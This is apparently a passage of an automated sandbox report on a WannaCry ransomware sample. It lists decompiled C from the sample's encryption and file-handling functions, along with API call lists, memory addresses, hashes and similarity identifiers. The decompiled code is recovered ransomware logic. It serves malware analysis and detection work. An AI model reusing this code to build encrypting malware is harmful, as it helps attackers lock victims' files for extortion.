												_t216 = _t352 + 0x418;
												_t303 = 3;
												do {
													 *_t216 =  *_t216 ^  *(_t216 - 4);
													_t216 =  &(_t216[1]);
													_t303 = _t303 - 1;
												} while (_t303 != 0);
												_t217 =  *(_t352 + 0x420);
												_a4 = _t217;
												_t220 = _t352 + 0x428;
												 *(_t352 + 0x424) =  *(_t352 + 0x424) ^ (( *0x004089FC << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *((_t217 & 0x000000ff) + 0x4089fc) & 0x000000ff;
												_t313 = 3;
												do {
													 *_t220 =  *_t220 ^  *(_t220 - 4);
													_t220 =  &(_t220[1]);
													_t313 = _t313 - 1;
												} while (_t313 != 0);
												L46:
												_a4 = _a4 & 0x00000000;
												if(_t329 <= 0) {
													goto L50;
												}
												_t314 = _t352 + 0x414;
												while(_a8 < _t345) {
													asm("cdq");
													_t347 = _a8 / _a12;
													asm("cdq");
													_t337 = _a8 % _a12;
													 *((intOrPtr*)(_t352 + 8 + (_t337 + _t347 * 8) * 4)) =  *_t314;
													_a4 = _a4 + 1;
													_t345 = _v12;
													_t338 =  *_t314;
													_t314 = _t314 + 4;
													_a8 = _a8 + 1;
													 *((intOrPtr*)(_t352 + 0x1e8 + (_t337 + ( *((intOrPtr*)(_t352 + 0x410)) - _t347) * 8) * 4)) = _t338;
													_t329 = _v8;
													if(_a4 < _t329) {
														continue;
													}
													goto L50;
												}
												goto L51;
											}
											if(_t329 <= 1) {
												goto L46;
											}
											_t229 = _t352 + 0x418;
											_t315 = _t329 - 1;
											do {
												 *_t229 =  *_t229 ^  *(_t229 - 4);
												_t229 =  &(_t229[1]);
												_t315 = _t315 - 1;
											} while (_t315 != 0);
											goto L46;
											L50:
										} while (_a8 < _t345);
										goto L51;
									}
									_t316 = _t352 + 0x414;
									while(_a8 < _t345) {
										asm("cdq");
										_a4 = _a8 / _a12;
										asm("cdq");
										_t340 = _a8 % _a12;
										 *((intOrPtr*)(_t352 + 8 + (_t340 + _a4 * 8) * 4)) =  *_t316;
										_a8 = _a8 + 1;
										_t341 =  *_t316;
										_t316 = _t316 + 4;
										 *((intOrPtr*)(_t352 + 0x1e8 + (_t340 + ( *((intOrPtr*)(_t352 + 0x410)) - _a4) * 8) * 4)) = _t341;
										_t329 = _v8;
										if(_a8 < _t329) {
											continue;
										}
										goto L35;
									}
									goto L51;
								}
								_a8 = _t329;
								do {
									_t317 =  &(_t291[1]);
									 *_t205 = ( *_t291 & 0x000000ff) << 0x18;
									 *_t205 =  *_t205 | ( *_t317 & 0x000000ff) << 0x00000010;
									_t319 =  &(_t317[2]);
									 *_t205 =  *_t205 |  *_t319 & 0x000000ff;
									_t291 =  &(_t319[1]);
									_t205 =  &(_t205[1]);
									_t60 =  &_a8;
									 *_t60 = _a8 - 1;
								} while ( *_t60 != 0);
								goto L31;
							}
							_t280 = _t352 + 0x1e8;
							do {
								_t320 = _a12;
								if(_t320 > 0) {
									memset(_t280, 0, _t320 << 2);
									_t354 = _t354 + 0xc;
								}
								_t327 = _t327 + 1;
								_t280 = _t280 + 0x20;
							} while (_t327 <=  *((intOrPtr*)(_t352 + 0x410)));
							goto L28;
						}
						_t281 = _t352 + 8;
						do {
							_t322 = _a12;
							if(_t322 > 0) {
								memset(_t281, 0, _t322 << 2);
								_t354 = _t354 + 0xc;
							}
							_t326 = _t326 + 1;
							_t281 = _t281 + 0x20;
						} while (_t326 <=  *((intOrPtr*)(_t352 + 0x410)));
						goto L23;
					}
					 *((intOrPtr*)(_t352 + 0x410)) = 0xe;
					goto L18;
				}
			}

















































                                                                                0x00402a83
                                                                                0x00402a85
                                                                                0x00402a8e
                                                                                0x00402a95
                                                                                0x00402a9e
                                                                                0x00402aa3
                                                                                0x00402aa4
                                                                                0x00402aa4
                                                                                0x00402aa9
                                                                                0x00402aae
                                                                                0x00402ab1
                                                                                0x00402ab4
                                                                                0x00402ac2
                                                                                0x00402ac6
                                                                                0x00402acd
                                                                                0x00402ad6
                                                                                0x00402adb
                                                                                0x00402adc
                                                                                0x00402adc
                                                                                0x00402ae1
                                                                                0x00402ae6
                                                                                0x00402af4
                                                                                0x00402af8
                                                                                0x00402aff
                                                                                0x00402b05
                                                                                0x00402b08
                                                                                0x00402b0d
                                                                                0x00402b0e
                                                                                0x00402b0e
                                                                                0x00402b14
                                                                                0x00402b23
                                                                                0x00402b2a
                                                                                0x00402b3f
                                                                                0x00402b44
                                                                                0x00402b4a
                                                                                0x00402b4f
                                                                                0x00402b75
                                                                                0x00402b7d
                                                                                0x00402b92
                                                                                0x00402b7f
                                                                                0x00402b81
                                                                                0x00402b81
                                                                                0x00000000
                                                                                0x00402b51
                                                                                0x00402b53
                                                                                0x00402b70
                                                                                0x00402b94
                                                                                0x00402b94
                                                                                0x00402b9a
                                                                                0x00402ba2
                                                                                0x00402ba3
                                                                                0x00402ba6
                                                                                0x00402bae
                                                                                0x00402bb1
                                                                                0x00402bcf
                                                                                0x00402bcf
                                                                                0x00402bd7
                                                                                0x00402bf8
                                                                                0x00402c00
                                                                                0x00402c01
                                                                                0x00402c0b
                                                                                0x00402c0e
                                                                                0x00402c12
                                                                                0x00402c15
                                                                                0x00402c17
                                                                                0x00402c1f
                                                                                0x00402c22
                                                                                0x00402c4e
                                                                                0x00402c4e
                                                                                0x00402c54
                                                                                0x00402ca5
                                                                                0x00402ca8
                                                                                0x00402e04
                                                                                0x00402e06
                                                                                0x00402e0d
                                                                                0x00402e10
                                                                                0x00402e73
                                                                                0x00402e73
                                                                                0x00402e7b
                                                                                0x00402e7b
                                                                                0x00402e18
                                                                                0x00402e1b
                                                                                0x00402e1b
                                                                                0x00402e20
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402e22
                                                                                0x00402e25
                                                                                0x00402e25
                                                                                0x00402e29
                                                                                0x00402e59
                                                                                0x00402e5b
                                                                                0x00402e5e
                                                                                0x00402e5e
                                                                                0x00402e61
                                                                                0x00402e61
                                                                                0x00402e64
                                                                                0x00402e68
                                                                                0x00402e6b
                                                                                0x00000000
                                                                                0x00402e1b
                                                                                0x00402cae
                                                                                0x00402cb5
                                                                                0x00402cb5
                                                                                0x00402cbf
                                                                                0x00402d05
                                                                                0x00402d0b
                                                                                0x00402d11
                                                                                0x00402d34
                                                                                0x00402d3a
                                                                                0x00402d3b
                                                                                0x00402d3e
                                                                                0x00402d40
                                                                                0x00402d43
                                                                                0x00402d43
                                                                                0x00402d46
                                                                                0x00402d4e
                                                                                0x00402d8f
                                                                                0x00402d95
                                                                                0x00402d9b
                                                                                0x00402d9c
                                                                                0x00402d9f
                                                                                0x00402da1
                                                                                0x00402da4
                                                                                0x00402da4
                                                                                0x00402da7
                                                                                0x00402da7
                                                                                0x00402dad
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402daf
                                                                                0x00402db5
                                                                                0x00402dbf
                                                                                0x00402dc3
                                                                                0x00402dc8
                                                                                0x00402dc9
                                                                                0x00402dcf
                                                                                0x00402ddb
                                                                                0x00402dde
                                                                                0x00402de4
                                                                                0x00402de6
                                                                                0x00402de9
                                                                                0x00402dec
                                                                                0x00402df3
                                                                                0x00402df9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402df9
                                                                                0x00000000
                                                                                0x00402db5
                                                                                0x00402d16
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402d1c
                                                                                0x00402d22
                                                                                0x00402d25
                                                                                0x00402d28
                                                                                0x00402d2a
                                                                                0x00402d2d
                                                                                0x00402d2d
                                                                                0x00000000
                                                                                0x00402dfb
                                                                                0x00402dfb
                                                                                0x00000000
                                                                                0x00402cb5
                                                                                0x00402c56
                                                                                0x00402c5c
                                                                                0x00402c6a
                                                                                0x00402c6e
                                                                                0x00402c74
                                                                                0x00402c75
                                                                                0x00402c7e
                                                                                0x00402c8b
                                                                                0x00402c91
                                                                                0x00402c93
                                                                                0x00402c96
                                                                                0x00402c9d
                                                                                0x00402ca3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402ca3
                                                                                0x00000000
                                                                                0x00402c5c
                                                                                0x00402c24
                                                                                0x00402c27
                                                                                0x00402c2d
                                                                                0x00402c2e
                                                                                0x00402c36
                                                                                0x00402c3f
                                                                                0x00402c43
                                                                                0x00402c45
                                                                                0x00402c46
                                                                                0x00402c49
                                                                                0x00402c49
                                                                                0x00402c49
                                                                                0x00000000
                                                                                0x00402c27
                                                                                0x00402bd9
                                                                                0x00402bdf
                                                                                0x00402bdf
                                                                                0x00402be4
                                                                                0x00402bea
                                                                                0x00402bea
                                                                                0x00402bea
                                                                                0x00402bec
                                                                                0x00402bed
                                                                                0x00402bf0
                                                                                0x00000000
                                                                                0x00402bdf
                                                                                0x00402bb3
                                                                                0x00402bb6
                                                                                0x00402bb6
                                                                                0x00402bbb
                                                                                0x00402bc1
                                                                                0x00402bc1
                                                                                0x00402bc1
                                                                                0x00402bc3
                                                                                0x00402bc4
                                                                                0x00402bc7
                                                                                0x00000000
                                                                                0x00402bb6
                                                                                0x00402b55
                                                                                0x00000000
                                                                                0x00402b55

                                                                                APIs
                                                                                • ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402A95
                                                                                • _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402AA4
                                                                                • ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402ACD
                                                                                • _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402ADC
                                                                                • ??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402AFF
                                                                                • _CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402B0E
                                                                                • memcpy.MSVCRT(?,?,00000010,?,?,00000000,00000010,?,?), ref: 00402B2A
                                                                                • memcpy.MSVCRT(?,?,?,?,?,00000010,?,?,00000000,00000010,?,?), ref: 00402B3F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??0exception@@ExceptionThrow$memcpy
                                                                                • String ID:
                                                                                • API String ID: 1881450474-3916222277
                                                                                • Opcode ID: 13455132f19fce7ccee5142b200569a1d3dc411a47d032a17fbb22a214c81369
                                                                                • Instruction ID: fcfef073648f46ce18afaeffe4143d5033c2e410e09e17396796de68d512254b
                                                                                • Opcode Fuzzy Hash: 13455132f19fce7ccee5142b200569a1d3dc411a47d032a17fbb22a214c81369
                                                                                • Instruction Fuzzy Hash: 8DD1C3706006099FDB28CF29C5846EA77F5FF48314F14C43EE95AEB281D778AA85CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004014A6 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 178filememoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040150D
                                                                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 00401529
                                                                                • memcmp.MSVCRT(?,WANACRY!,00000008), ref: 00401572
                                                                                • GlobalAlloc.KERNEL32(00000000,?,?,?,00000010,?,?,?,?), ref: 0040166D
                                                                                • _local_unwind2.MSVCRT(?,000000FF), ref: 004016D6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AllocCreateGlobalSize_local_unwind2memcmp
                                                                                • String ID: WANACRY!
                                                                                • API String ID: 283026544-1240840912
                                                                                • Opcode ID: 3616707767261f84fde6c13708b35c3d4dbb974938da28d5f777545cb9cffa02
                                                                                • Instruction ID: 23909f9b909e50c20e483d6bc4be6e23e355ec3bf8b0a6de4718622c8bde6caa
                                                                                • Opcode Fuzzy Hash: 3616707767261f84fde6c13708b35c3d4dbb974938da28d5f777545cb9cffa02
                                                                                • Instruction Fuzzy Hash: 6E512C71900209ABDB219F95CD84FEEB7BCEB08790F1444BAF515F21A0D739AA45CB28
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040350F Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 214COMMONCrypto
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 55%
                                                                                			E0040350F(void* __ecx, signed int _a4, signed char* _a8) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v56;
				signed int _t150;
				signed int _t151;
				signed int _t155;
				signed int* _t157;
				signed char _t158;
				intOrPtr _t219;
				signed int _t230;
				signed char* _t236;
				signed char* _t237;
				signed char* _t238;
				signed char* _t239;
				signed int* _t240;
				signed char* _t242;
				signed char* _t243;
				signed char* _t245;
				signed int _t260;
				signed int* _t273;
				signed int _t274;
				void* _t275;
				void* _t276;

				_t275 = __ecx;
				if( *((char*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v56);
					L0040776E();
				}
				_t150 =  *(_t275 + 0x3cc);
				if(_t150 == 0x10) {
					return E00402E7E(_t275, _a4, _a8);
				}
				asm("cdq");
				_t230 = 4;
				_t151 = _t150 / _t230;
				_t274 = _t151;
				asm("sbb eax, eax");
				_t155 = ( ~(_t151 - _t230) & (0 | _t274 != 0x00000006) + 0x00000001) << 5;
				_v28 =  *((intOrPtr*)(_t155 + 0x40bc24));
				_v24 =  *((intOrPtr*)(_t155 + 0x40bc2c));
				_v32 =  *((intOrPtr*)(_t155 + 0x40bc34));
				_t157 = _t275 + 0x454;
				if(_t274 > 0) {
					_v16 = _t274;
					_v8 = _t275 + 8;
					_t242 = _a4;
					do {
						_t243 =  &(_t242[1]);
						 *_t157 = ( *_t242 & 0x000000ff) << 0x18;
						 *_t157 =  *_t157 | ( *_t243 & 0x000000ff) << 0x00000010;
						_t245 =  &(_t243[2]);
						_t273 = _t157;
						 *_t157 =  *_t157 |  *_t245 & 0x000000ff;
						_v8 = _v8 + 4;
						_t242 =  &(_t245[1]);
						_t157 =  &(_t157[1]);
						 *_t273 =  *_t273 ^  *_v8;
						_t27 =  &_v16;
						 *_t27 = _v16 - 1;
					} while ( *_t27 != 0);
				}
				_t158 = 1;
				_v16 = _t158;
				if( *(_t275 + 0x410) > _t158) {
					_v12 = _t275 + 0x28;
					do {
						if(_t274 > 0) {
							_t34 =  &_v28; // 0x403b51
							_t260 =  *_t34;
							_v8 = _v12;
							_a4 = _t260;
							_v36 = _v24 - _t260;
							_t240 = _t275 + 0x434;
							_v40 = _v32 - _t260;
							_v20 = _t274;
							do {
								asm("cdq");
								_v44 = 0;
								asm("cdq");
								asm("cdq");
								_v8 = _v8 + 4;
								 *_t240 =  *(0x4093fc + _v44 * 4) ^  *(0x4097fc + ( *(_t275 + 0x454 + (_v40 + _a4) % _t274 * 4) & 0x000000ff) * 4) ^  *0x00408FFC ^  *0x00408BFC ^  *_v8;
								_t240 =  &(_t240[1]);
								_a4 = _a4 + 1;
								_t84 =  &_v20;
								 *_t84 = _v20 - 1;
							} while ( *_t84 != 0);
						}
						memcpy(_t275 + 0x454, _t275 + 0x434, _t274 << 2);
						_v12 = _v12 + 0x20;
						_t276 = _t276 + 0xc;
						_v16 = _v16 + 1;
						_t158 = _v16;
					} while (_t158 <  *(_t275 + 0x410));
				}
				_v8 = _v8 & 0x00000000;
				if(_t274 > 0) {
					_t236 = _a8;
					_t219 = _v24;
					_a8 = _t275 + 0x454;
					_t100 =  &_v28; // 0x403b51
					_v44 =  *_t100 - _t219;
					_v40 = _v32 - _t219;
					do {
						_a8 =  &(_a8[4]);
						_a4 =  *((intOrPtr*)(_t275 + 8 + (_v8 +  *(_t275 + 0x410) * 8) * 4));
						 *_t236 =  *0x004089FC ^ _a4 >> 0x00000018;
						_t237 =  &(_t236[1]);
						asm("cdq");
						 *_t237 =  *0x004089FC ^ _a4 >> 0x00000010;
						asm("cdq");
						_t238 =  &(_t237[1]);
						 *_t238 =  *0x004089FC ^ _a4 >> 0x00000008;
						_t239 =  &(_t238[1]);
						asm("cdq");
						_t158 =  *(( *(_t275 + 0x454 + (_v40 + _t219) % _t274 * 4) & 0x000000ff) + 0x4089fc) ^ _a4;
						 *_t239 = _t158;
						_t236 =  &(_t239[1]);
						_v8 = _v8 + 1;
						_t219 = _t219 + 1;
					} while (_v8 < _t274);
				}
				return _t158;
			}


































                                                                                0x00403517
                                                                                0x0040351e
                                                                                0x00403528
                                                                                0x00403531
                                                                                0x00403536
                                                                                0x00403537
                                                                                0x00403537
                                                                                0x0040353c
                                                                                0x00403545
                                                                                0x00000000
                                                                                0x0040354f
                                                                                0x0040355b
                                                                                0x0040355c
                                                                                0x0040355d
                                                                                0x0040355f
                                                                                0x0040356e
                                                                                0x00403572
                                                                                0x0040357d
                                                                                0x0040358c
                                                                                0x0040358f
                                                                                0x00403592
                                                                                0x00403598
                                                                                0x0040359d
                                                                                0x004035a0
                                                                                0x004035a3
                                                                                0x004035a6
                                                                                0x004035ac
                                                                                0x004035ad
                                                                                0x004035b5
                                                                                0x004035be
                                                                                0x004035bf
                                                                                0x004035c4
                                                                                0x004035c9
                                                                                0x004035cd
                                                                                0x004035d0
                                                                                0x004035d3
                                                                                0x004035d5
                                                                                0x004035d5
                                                                                0x004035d5
                                                                                0x004035a6
                                                                                0x004035dc
                                                                                0x004035e3
                                                                                0x004035e6
                                                                                0x004035ef
                                                                                0x004035f2
                                                                                0x004035f4
                                                                                0x004035fd
                                                                                0x004035fd
                                                                                0x00403600
                                                                                0x00403608
                                                                                0x0040360b
                                                                                0x00403613
                                                                                0x00403619
                                                                                0x0040361c
                                                                                0x0040361f
                                                                                0x00403627
                                                                                0x0040363a
                                                                                0x0040363d
                                                                                0x00403660
                                                                                0x00403682
                                                                                0x00403688
                                                                                0x0040368a
                                                                                0x0040368d
                                                                                0x00403690
                                                                                0x00403690
                                                                                0x00403690
                                                                                0x0040361f
                                                                                0x004036a9
                                                                                0x004036ae
                                                                                0x004036b2
                                                                                0x004036b5
                                                                                0x004036b8
                                                                                0x004036bb
                                                                                0x004035f2
                                                                                0x004036c7
                                                                                0x004036cd
                                                                                0x004036d3
                                                                                0x004036d6
                                                                                0x004036df
                                                                                0x004036e2
                                                                                0x004036e7
                                                                                0x004036ef
                                                                                0x004036f2
                                                                                0x00403701
                                                                                0x00403709
                                                                                0x0040371f
                                                                                0x00403726
                                                                                0x00403727
                                                                                0x00403741
                                                                                0x00403745
                                                                                0x0040374a
                                                                                0x00403760
                                                                                0x00403767
                                                                                0x00403768
                                                                                0x0040377d
                                                                                0x00403780
                                                                                0x00403782
                                                                                0x00403783
                                                                                0x00403786
                                                                                0x00403787
                                                                                0x004036f2
                                                                                0x00403794

                                                                                APIs
                                                                                • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,?,?,?,?,00403B51,?,?,?), ref: 00403528
                                                                                • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,?,?,00403B51,?,?,?), ref: 00403537
                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00403B51,?,?), ref: 004036A9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??0exception@@ExceptionThrowmemcpy
                                                                                • String ID: $Q;@
                                                                                • API String ID: 2382887404-262343263
                                                                                • Opcode ID: 68433a68c8f87a96c4578501cf6b50a347b0c2ca376bc2ea45e1a632b2ad4c4a
                                                                                • Instruction ID: bc36c6e363c45e845c5013d3ee32ff29fee655b638a1b5d52e43d816bbd12583
                                                                                • Opcode Fuzzy Hash: 68433a68c8f87a96c4578501cf6b50a347b0c2ca376bc2ea45e1a632b2ad4c4a
                                                                                • Instruction Fuzzy Hash: A581C3759002499FCB05CF68C9809EEBBF5EF89308F2484AEE595E7352C234BA45CF58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00403797 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 214COMMONCrypto
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 54%
                                                                                			E00403797(void* __ecx, signed int _a4, signed char* _a8) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v56;
				signed int _t150;
				signed int _t151;
				signed int _t155;
				signed int* _t157;
				signed char _t158;
				intOrPtr _t219;
				signed int _t230;
				signed char* _t236;
				signed char* _t237;
				signed char* _t238;
				signed char* _t239;
				signed int* _t240;
				signed char* _t242;
				signed char* _t243;
				signed char* _t245;
				signed int _t260;
				signed int* _t273;
				signed int _t274;
				void* _t275;
				void* _t276;

				_t275 = __ecx;
				if( *((char*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v56);
					L0040776E();
				}
				_t150 =  *(_t275 + 0x3cc);
				if(_t150 == 0x10) {
					return E004031BC(_t275, _a4, _a8);
				}
				asm("cdq");
				_t230 = 4;
				_t151 = _t150 / _t230;
				_t274 = _t151;
				asm("sbb eax, eax");
				_t155 = ( ~(_t151 - _t230) & (0 | _t274 != 0x00000006) + 0x00000001) << 5;
				_v28 =  *((intOrPtr*)(_t155 + 0x40bc28));
				_v24 =  *((intOrPtr*)(_t155 + 0x40bc30));
				_v32 =  *((intOrPtr*)(_t155 + 0x40bc38));
				_t157 = _t275 + 0x454;
				if(_t274 > 0) {
					_v16 = _t274;
					_v8 = _t275 + 0x1e8;
					_t242 = _a4;
					do {
						_t243 =  &(_t242[1]);
						 *_t157 = ( *_t242 & 0x000000ff) << 0x18;
						 *_t157 =  *_t157 | ( *_t243 & 0x000000ff) << 0x00000010;
						_t245 =  &(_t243[2]);
						_t273 = _t157;
						 *_t157 =  *_t157 |  *_t245 & 0x000000ff;
						_v8 = _v8 + 4;
						_t242 =  &(_t245[1]);
						_t157 =  &(_t157[1]);
						 *_t273 =  *_t273 ^  *_v8;
						_t27 =  &_v16;
						 *_t27 = _v16 - 1;
					} while ( *_t27 != 0);
				}
				_t158 = 1;
				_v16 = _t158;
				if( *(_t275 + 0x410) > _t158) {
					_v12 = _t275 + 0x208;
					do {
						if(_t274 > 0) {
							_t260 = _v28;
							_v8 = _v12;
							_a4 = _t260;
							_v36 = _v24 - _t260;
							_t240 = _t275 + 0x434;
							_v40 = _v32 - _t260;
							_v20 = _t274;
							do {
								asm("cdq");
								_v44 = 0;
								asm("cdq");
								asm("cdq");
								_v8 = _v8 + 4;
								 *_t240 =  *(0x40a3fc + _v44 * 4) ^  *(0x40a7fc + ( *(_t275 + 0x454 + (_v40 + _a4) % _t274 * 4) & 0x000000ff) * 4) ^  *0x00409FFC ^  *0x00409BFC ^  *_v8;
								_t240 =  &(_t240[1]);
								_a4 = _a4 + 1;
								_t84 =  &_v20;
								 *_t84 = _v20 - 1;
							} while ( *_t84 != 0);
						}
						memcpy(_t275 + 0x454, _t275 + 0x434, _t274 << 2);
						_v12 = _v12 + 0x20;
						_t276 = _t276 + 0xc;
						_v16 = _v16 + 1;
						_t158 = _v16;
					} while (_t158 <  *(_t275 + 0x410));
				}
				_v8 = _v8 & 0x00000000;
				if(_t274 > 0) {
					_t236 = _a8;
					_t219 = _v24;
					_a8 = _t275 + 0x454;
					_v44 = _v28 - _t219;
					_v40 = _v32 - _t219;
					do {
						_a8 =  &(_a8[4]);
						_a4 =  *((intOrPtr*)(_t275 + 0x1e8 + (_v8 +  *(_t275 + 0x410) * 8) * 4));
						 *_t236 =  *0x00408AFC ^ _a4 >> 0x00000018;
						_t237 =  &(_t236[1]);
						asm("cdq");
						 *_t237 =  *0x00408AFC ^ _a4 >> 0x00000010;
						asm("cdq");
						_t238 =  &(_t237[1]);
						 *_t238 =  *0x00408AFC ^ _a4 >> 0x00000008;
						_t239 =  &(_t238[1]);
						asm("cdq");
						_t158 =  *(( *(_t275 + 0x454 + (_v40 + _t219) % _t274 * 4) & 0x000000ff) + 0x408afc) ^ _a4;
						 *_t239 = _t158;
						_t236 =  &(_t239[1]);
						_v8 = _v8 + 1;
						_t219 = _t219 + 1;
					} while (_v8 < _t274);
				}
				return _t158;
			}


































                                                                                0x0040379f
                                                                                0x004037a6
                                                                                0x004037b0
                                                                                0x004037b9
                                                                                0x004037be
                                                                                0x004037bf
                                                                                0x004037bf
                                                                                0x004037c4
                                                                                0x004037cd
                                                                                0x00000000
                                                                                0x004037d7
                                                                                0x004037e3
                                                                                0x004037e4
                                                                                0x004037e5
                                                                                0x004037e7
                                                                                0x004037f6
                                                                                0x004037fa
                                                                                0x00403805
                                                                                0x00403814
                                                                                0x00403817
                                                                                0x0040381a
                                                                                0x00403820
                                                                                0x00403828
                                                                                0x0040382b
                                                                                0x0040382e
                                                                                0x00403831
                                                                                0x00403837
                                                                                0x00403838
                                                                                0x00403840
                                                                                0x00403849
                                                                                0x0040384a
                                                                                0x0040384f
                                                                                0x00403854
                                                                                0x00403858
                                                                                0x0040385b
                                                                                0x0040385e
                                                                                0x00403860
                                                                                0x00403860
                                                                                0x00403860
                                                                                0x00403831
                                                                                0x00403867
                                                                                0x0040386e
                                                                                0x00403871
                                                                                0x0040387d
                                                                                0x00403880
                                                                                0x00403882
                                                                                0x0040388b
                                                                                0x0040388e
                                                                                0x00403896
                                                                                0x00403899
                                                                                0x004038a1
                                                                                0x004038a7
                                                                                0x004038aa
                                                                                0x004038ad
                                                                                0x004038b5
                                                                                0x004038c8
                                                                                0x004038cb
                                                                                0x004038ee
                                                                                0x00403910
                                                                                0x00403916
                                                                                0x00403918
                                                                                0x0040391b
                                                                                0x0040391e
                                                                                0x0040391e
                                                                                0x0040391e
                                                                                0x004038ad
                                                                                0x00403937
                                                                                0x0040393c
                                                                                0x00403940
                                                                                0x00403943
                                                                                0x00403946
                                                                                0x00403949
                                                                                0x00403880
                                                                                0x00403955
                                                                                0x0040395b
                                                                                0x00403961
                                                                                0x00403964
                                                                                0x0040396d
                                                                                0x00403975
                                                                                0x0040397d
                                                                                0x00403980
                                                                                0x0040398f
                                                                                0x0040399a
                                                                                0x004039b0
                                                                                0x004039b7
                                                                                0x004039b8
                                                                                0x004039d2
                                                                                0x004039d6
                                                                                0x004039db
                                                                                0x004039f1
                                                                                0x004039f8
                                                                                0x004039f9
                                                                                0x00403a0e
                                                                                0x00403a11
                                                                                0x00403a13
                                                                                0x00403a14
                                                                                0x00403a17
                                                                                0x00403a18
                                                                                0x00403980
                                                                                0x00403a25

                                                                                APIs
                                                                                • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,?,?,?,?,00403B9C,?,?,?), ref: 004037B0
                                                                                • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,?,?,00403B9C,?,?,?), ref: 004037BF
                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00403B9C,?,?), ref: 00403937
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
